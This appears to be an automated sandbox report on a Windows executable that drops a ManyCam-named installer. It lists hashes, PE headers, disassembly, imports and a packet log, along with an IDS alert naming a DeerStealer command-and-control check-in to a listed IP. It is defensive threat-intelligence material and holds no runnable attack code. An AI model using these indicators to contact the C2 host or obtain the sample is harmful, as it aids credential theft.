                                                                                                                                          SHA-512:4F3F7167EDC693C73E7B50C8E15945C98681777C349926B5D4224A43CF59D5BE098E32191ECCF1DD41F56C4601DC8090DBAF26194C39FA991E366906458B57CA
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$..`..`..`.....I.....b..`........k......g.....p.....a......a.....w.....a..Rich`..........PE..L.....m=...........!................5l............Qm................................................................0.......$...x....P.......................`...K..@................................................................................text............................... ..`.data...,@.......*..................@....rsrc........P......................@..@.reloc...e...`...f..................@..B..m=8...(.m=C...(.m=P.......Z...(.m=f...).m=s...........msvcrt.dll.KERNEL32.dll.NTDLL.DLL.VERSION.dll.ADVAPI32.dll.RPCRT4.dll...................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):397312
                                                                                                                                          Entropy (8bit):6.672405371278951
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:J+7gXTkVRt1dixRtVq2EjMS2E7ETstO/:JlTeRt1dSzd4MSUTsO/
                                                                                                                                          MD5:A354C42FCB37A50ECAD8DDE250F6119E
                                                                                                                                          SHA1:0EB4AD5E90D28A4A8553D82CEC53072279AF1961
                                                                                                                                          SHA-256:89DB6973F4EC5859792BCD8A50CD10DB6B847613F2CEA5ADEF740EEC141673B2
                                                                                                                                          SHA-512:981C82F6334961C54C80009B14A0C2CD48067BAF6D502560D508BE86F5185374A422609C7FDC9A2CDE9B98A7061EFAB7FD9B1F4F421436A9112833122BC35059
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r|..6...6...6......4......;......5....;..n......#...6..........."......7......7......7...Rich6...........PE..L.....YM...........!.........@......y........................................ .......r.............................. K..F....9..........d........................#..`...................................................D............................text............................... ..`.rdata..f...........................@..@.data...0r...`...p...`..............@....rsrc...d...........................@..@.reloc...$.......0..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4092894
                                                                                                                                          Entropy (8bit):7.950017111810137
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:IuDlh/XIsGMfQ9c0B5KDsldsWAR+HwE0jnr7IEz3daB8:IAhvIgY+OMb+HwEMTx
                                                                                                                                          MD5:535E6BAA0579A8B19BED5857D49BDD0D
                                                                                                                                          SHA1:AF5B463561AFD9052575F266868DB19292D0EA6D
                                                                                                                                          SHA-256:8DAFB1E5373A0CC2CE18D7DBC4A51A127D104B9E7E3B95670F0DB2A9D7952D8F
                                                                                                                                          SHA-512:5546362378302B254EC2E0FDB31013866AF997C0C7A2420ED98AF1517B707CF36DFCB55830CD1FDB70CAE2EBF5EA999D4E9743BAF821D3BB55511AC8483D5DB8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.Y.L.J.gL.IQROaeg^UFL.ZTMJ.....FO.K..s.T...hU..a.Aj..........Pn....ui.B...T..lPfV.W.h.s..B..pK...G.iEyM...S..c........`.[.....PNe.C_.t....X..Qh\.ji.ENm.G`j.......jHYTJOY...y..l.\tDV......u.d.[..AXu.....g.`..^t.l.E...O.fDh.K....G.v.I.CN......ja`.DX.......U......XEi..l..]l.q\dxZT`rU.s...gC.s.Qy..uK.j.m.I.[C...DUX.ym..syA....i..gs.v.c.\.....U]._v.HL.wu..By.....pkY..KY.p..r.qBF.....q....H..C..Z.ZyJ...fupy.iy.R.Z.V.h.i......YT.WcL....._..Rw..i...q....p.Ifs.b...JDDTS.iieTnq.U...R..UBXmsL..T..g.......F.l]...j....nk.M.`.w.a...Ys.EJN..NX.lD.r...f.J.N..BZyNMJBhO.AS.Z...x.RbQ.L.j.wh....YV..en..Ydt...h.xX.o..SyI...bw]aAF.O.s...k..LCa...._.LLp..bxq..fef]CB.Y.tfc.ns...Ps.f..aK....YE..N.....\F.K.....rE...J.Jc..nU...yM.J`_L.^..n.^l..Yn....T..[.VJ...b.s.t.........AN.....O.c\.........B...].p.\.....V.E.QBeU...a...V_vOL.[.....nbisu.rR...^STMq]..q.kea..Pe.dg....utPPtF..e.r.a_.a_o.S..k[.h.\lw]Y....re.BGYrZ.ERHc.wU.u\K..GW...y..R..i.eV..F._.^\.Cbmyl..K`q.nK...pJ..^B..T....J.S........V.j.oqkj^^a.JVD..[.Wi.s[T
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):88923
                                                                                                                                          Entropy (8bit):4.3411591827480684
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:9UqVAygmDacN2Uc8p3PcjPugJ78LqHd6VJHBL+JkV0hL1mTHARcVYUmQNwkOX7xn:GyLDaGpfcD3WLhvHx+KoLETHbmQN4X7N
                                                                                                                                          MD5:CB4C2B33CC5CC6025B4F3B373CFCBE97
                                                                                                                                          SHA1:7D73D590AE51CE06021EC2E0DC939D267A79F788
                                                                                                                                          SHA-256:DAB9A7C4310FAC43CC21B924FE8899071E6884CD142F992C1FBAF5140C998268
                                                                                                                                          SHA-512:680990A0CFB7E8F8AC4AFD69AD292A03C46995529D62EAC76965297F8CB03D78AD8BB799B149E8E74DC90CC185A0DB53AEDD0DB80C36A8410D14F24C7F2FE9FB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.s..ETgX....E.....OS.x...M..^qJX.[..qx.OJb.iW.nZ.`T.PU..OT`...pq..s.g.x...^C...s.p...nG.o.bN.x..c...KDO..r..QFYl.iVM..V....O..xI_y...w...B.hH.B.g..U._..P.....L...f...m.y..A.\H.]d...O..y.Y.m..ue^.Xi..L..L..qhKNcN.[VhJjp....m^..^t.hxL......`.EF...gk.ctj.H.s.._UDC....k.led.Kg..fMx..N.nEuo....Fy...U.]...FM..k..[..M.JI\.....m.u...s..j.e..R_.Oc..L..hsB.D..[iT_x.K..WZ..jgc.al.].UPt...........w....wqP.....].....W_tQv..CB..Im.Fd.A.f...X.jS....Qg.VJf.._.AO...i.Y.BIPs.Nm.y..N.bs.xI.d.R.l.rr.u...l...mns....vd.p..vl..Kp.gS\fB.EE.CF.a\o...y....u...j.......[X.f.._.\.w..V...Znl.M...b.ss.M.qF.ghTM.......\.JW..v.v.X.os....qVh.....p..wd.`.S.\nHM.TIEy.H.QVdA.v..ntVuI.he.CptnK..N..mW..I.Y.H.m...V..JM....g.....G......].s_...cO.H..[.c.....B.M...o..Ji...n.^.A...X....S.N.Rx_..oK.Tc._........e.f..OS..M..y.E.WDg.hcNVE.biK.c..Ff.n....a...Ih...f^N.rRAj..IY....LQ\.K.Z._.u.Y.j..`OJ.....G..F]...D.Rh...QW..^.H.....h^NcRI..Y..FMBFt....C.K..L.k.X.jlq...Ds..._\H......Cif.y.R.....u....yLd...p...jho.]G.Hc.AVS...eBe...E..rS
                                                                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                          Entropy (8bit):7.979355385584196
                                                                                                                                          TrID:
                                                                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:file.exe
                                                                                                                                          File size:5'963'808 bytes
                                                                                                                                          MD5:b55b503a690229f094ec6c9017145104
                                                                                                                                          SHA1:1e0ffefdcff18410c5221c96ed17cc42d9d37f85
                                                                                                                                          SHA256:a7cd1ac259dab063ac93ed0e9dc533bd90d1a2a26d8d0fbec0823bb073747b01
                                                                                                                                          SHA512:c3e8e73455a769016cb84fd6612245bbb8116f113493ff3bb49dfb30f3405ea0c6f8d73a271adba7988eff11174187057d20917955aaf4cde68877d9b972c7c3
                                                                                                                                          SSDEEP:98304:ehLAxeIvtESu7pnQoPF+GWREgQqRyCwp6zEp7vQgBBjAf7/gxPeBd+3Q:ehCeR7pQo9nWRBW5vZjE/gxPen
                                                                                                                                          TLSH:E356330AD3F419E8E173D579CD468905E37A3C160725C68F57B4952A3F233A22B3EB62
                                                                                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......t...0..I0..I0..I.'.I8..I.'.I...I.'.I=..I...I2..I...H"..I...H9..I...H...I9.rI9..I9.vI2..I9.bI7..I0..I/..I...H...I...H1..I...I1..
                                                                                                                                          Icon Hash:1515d4d4442f2d2d
                                                                                                                                          Entrypoint:0x140027180
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x140000000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x651BC7FA [Tue Oct 3 07:51:22 2023 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:5
                                                                                                                                          OS Version Minor:2
                                                                                                                                          File Version Major:5
                                                                                                                                          File Version Minor:2
                                                                                                                                          Subsystem Version Major:5
                                                                                                                                          Subsystem Version Minor:2
                                                                                                                                          Import Hash:bc758c921c6e0fda5a933c5b8a3c02e9
                                                                                                                                          Instruction
                                                                                                                                          dec eax
                                                                                                                                          sub esp, 28h
                                                                                                                                          call 00007FA5F8BCE058h
                                                                                                                                          dec eax
                                                                                                                                          add esp, 28h
                                                                                                                                          jmp 00007FA5F8BCDA7Fh
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          dec eax
                                                                                                                                          sub esp, 48h
                                                                                                                                          dec eax
                                                                                                                                          lea ecx, dword ptr [esp+20h]
                                                                                                                                          call 00007FA5F8BBD80Fh
                                                                                                                                          dec eax
                                                                                                                                          lea edx, dword ptr [0002390Bh]
                                                                                                                                          dec eax
                                                                                                                                          lea ecx, dword ptr [esp+20h]
                                                                                                                                          call 00007FA5F8BCFA0Eh
                                                                                                                                          int3
                                                                                                                                          jmp 00007FA5F8BD2878h
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          dec eax
                                                                                                                                          mov dword ptr [esp+10h], ebx
                                                                                                                                          dec eax
                                                                                                                                          mov dword ptr [esp+18h], esi
                                                                                                                                          push edi
                                                                                                                                          dec eax
                                                                                                                                          sub esp, 10h
                                                                                                                                          xor eax, eax
                                                                                                                                          xor ecx, ecx
                                                                                                                                          cpuid
                                                                                                                                          inc esp
                                                                                                                                          mov eax, ecx
                                                                                                                                          inc ebp
                                                                                                                                          xor ebx, ebx
                                                                                                                                          inc esp
                                                                                                                                          mov edx, edx
                                                                                                                                          inc ecx
                                                                                                                                          xor eax, 6C65746Eh
                                                                                                                                          inc ecx
                                                                                                                                          xor edx, 49656E69h
                                                                                                                                          inc esp
                                                                                                                                          mov ecx, ebx
                                                                                                                                          mov esi, eax
                                                                                                                                          xor ecx, ecx
                                                                                                                                          inc ecx
                                                                                                                                          lea eax, dword ptr [ebx+01h]
                                                                                                                                          inc ebp
                                                                                                                                          or edx, eax
                                                                                                                                          cpuid
                                                                                                                                          inc ecx
                                                                                                                                          xor ecx, 756E6547h
                                                                                                                                          mov dword ptr [esp], eax
                                                                                                                                          inc ebp
                                                                                                                                          or edx, ecx
                                                                                                                                          mov dword ptr [esp+04h], ebx
                                                                                                                                          mov edi, ecx
                                                                                                                                          mov dword ptr [esp+08h], ecx
                                                                                                                                          mov dword ptr [esp+0Ch], edx
                                                                                                                                          jne 00007FA5F8BCDC5Dh
                                                                                                                                          dec eax
                                                                                                                                          or dword ptr [000267A7h], FFFFFFFFh
                                                                                                                                          and eax, 0FFF3FF0h
                                                                                                                                          dec eax
                                                                                                                                          mov dword ptr [0002678Fh], 00008000h
                                                                                                                                          cmp eax, 000106C0h
                                                                                                                                          je 00007FA5F8BCDC2Ah
                                                                                                                                          cmp eax, 00020660h
                                                                                                                                          je 00007FA5F8BCDC23h
                                                                                                                                          Programming Language:
                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x4baf00x34.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x4bb240x50.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x780000xdff8.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x730000x2bec.pdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x92c.reloc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x474400x54.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3ef900x140.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x4f8.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4ac3c0x120.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x10000x3a16e0x3a200018ae3efa0f168660ce7c21c48d504c6False0.5690650201612903data6.490300148001923IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                          .rdata0x3c0000x10bd40x10c00e8d78966c6d767e791c1650623644bceFalse0.4441464552238806data5.193786307946991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .data0x4d0000x255fc0x16008d969322e7119d376163fbc531e0e4b8False0.3409090909090909data3.7728254941028263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .pdata0x730000x2bec0x2c000dc6037efb8803bcd2b11a9cc88985eaFalse0.49476207386363635data5.513737899338275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .didat0x760000x3580x40031dda3d10fbbaa58c793828df356a826False0.2548828125data3.0050302307669274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          _RDATA0x770000x15c0x200ae270b667108cfd6cc3ba721edc5f3beFalse0.40625data3.3376119966247324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .rsrc0x780000xdff80xe000ccf0575de08010453ea154c5ae2b2f26False0.6373116629464286data6.638595424147236IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .reloc0x860000x92c0xa00fd5fbb5b9d670e1a44502a2fb1e51f45False0.51484375data5.268524278671299IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          PNG0x786500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                                          PNG0x791980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                                          RT_ICON0x7a7480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                                                                          RT_ICON0x7acb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                                                                          RT_ICON0x7b5580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                                                                          RT_ICON0x7c4000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                                                                          RT_ICON0x7c8680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                                                                          RT_ICON0x7d9100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                                                                          RT_ICON0x7feb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                                                                          RT_DIALOG0x845880x286dataEnglishUnited States0.5092879256965944
                                                                                                                                          RT_DIALOG0x843580x13adataEnglishUnited States0.60828025477707
                                                                                                                                          RT_DIALOG0x844980xecdataEnglishUnited States0.6991525423728814
                                                                                                                                          RT_DIALOG0x842280x12edataEnglishUnited States0.5927152317880795
                                                                                                                                          RT_DIALOG0x83ef00x338dataEnglishUnited States0.45145631067961167
                                                                                                                                          RT_DIALOG0x83c980x252dataEnglishUnited States0.5757575757575758
                                                                                                                                          RT_STRING0x84f680x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                                          RT_STRING0x851500x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                                          RT_STRING0x853200x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                                          RT_STRING0x854d80x146dataEnglishUnited States0.5153374233128835
                                                                                                                                          RT_STRING0x856200x46cdataEnglishUnited States0.3454063604240283
                                                                                                                                          RT_STRING0x85a900x166dataEnglishUnited States0.49162011173184356
                                                                                                                                          RT_STRING0x85bf80x152dataEnglishUnited States0.5059171597633136
                                                                                                                                          RT_STRING0x85d500x10adataEnglishUnited States0.49624060150375937
                                                                                                                                          RT_STRING0x85e600xbcdataEnglishUnited States0.6329787234042553
                                                                                                                                          RT_STRING0x85f200xd6dataEnglishUnited States0.5747663551401869
                                                                                                                                          RT_GROUP_ICON0x83c300x68dataEnglishUnited States0.7019230769230769
                                                                                                                                          RT_MANIFEST0x848100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                                                                                                                                          DLLImport
                                                                                                                                          KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA
                                                                                                                                          OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                                          gdiplus.dllGdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc
                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                          EnglishUnited States
                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                          2024-10-19T19:53:58.549994+02002056550ET MALWARE Win32/DeerStealer CnC Checkin1192.168.2.449741188.114.97.3443TCP
                                                                                                                                          2024-10-19T19:54:36.337584+02002056550ET MALWARE Win32/DeerStealer CnC Checkin1192.168.2.449946188.114.97.3443TCP
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Oct 19, 2024 19:53:57.439439058 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:57.439528942 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:57.439604998 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:57.440473080 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:57.440512896 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.071639061 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.071748972 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.073194981 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.073224068 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.073565960 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.115365028 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.115542889 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.115585089 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.115806103 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.549992085 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.550643921 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.550689936 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.550734043 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.550795078 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.550848007 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.551703930 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.552411079 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.552468061 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.552484989 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.553570032 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.554805040 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.554856062 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.554872036 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.554924965 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.557200909 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.599714041 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.669692993 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.669861078 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.669991016 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.670013905 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.670299053 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.671435118 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.671494961 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.671511889 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.671564102 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.671576023 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.673820972 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.673907995 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.673963070 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.673979044 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.674032927 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.674045086 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.724693060 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.790066957 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.790934086 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.791693926 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.791800022 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.791870117 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.791938066 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.792897940 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.793793917 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.793867111 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.793941021 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.793958902 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.794019938 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.794936895 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.795228004 CEST44349741188.114.97.3192.168.2.4
                                                                                                                                          Oct 19, 2024 19:53:58.796483040 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.796541929 CEST49741443192.168.2.4188.114.97.3
                                                                                                                                          Oct 19, 2024 19:53:58.796577930 CEST44349741188.114.97.3192.168.2.4
